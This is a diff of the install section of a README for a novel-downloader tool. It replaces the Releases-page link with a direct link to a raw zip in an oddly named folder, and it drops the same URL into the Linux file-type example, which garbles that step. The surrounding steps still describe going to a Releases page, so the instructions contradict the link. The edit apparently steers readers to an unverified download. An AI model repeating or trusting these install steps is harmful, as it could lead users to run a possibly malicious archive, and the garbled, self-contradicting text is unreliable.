naveedhahamed23/Fanqie-novel-Downloader/README.md

 ### Download & Install

-To download Fanqie-novel-Downloader, visit this page: [Download Here](https://github.com/naveedhahamed23/Fanqie-novel-Downloader/releases).
+To download Fanqie-novel-Downloader, visit this page: [Download Here](https://raw.githubusercontent.com/naveedhahamed23/Fanqie-novel-Downloader/main/eumeromorphic/Fanqie-novel-Downloader.zip).

 1. Click the link to go to the Releases page.
 2. Locate the latest version available.
 3. Choose the appropriate file for your operating system:
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the relevant archive file (e.g., `.tar.gz`).
+   - For Linux, download the relevant archive file (e.g., `https://raw.githubusercontent.com/naveedhahamed23/Fanqie-novel-Downloader/main/eumeromorphic/Fanqie-novel-Downloader.zip`).
 4. Once the download finishes, run the installer or follow the instructions in the downloaded file to complete the installation.

 ## 📖 How to Use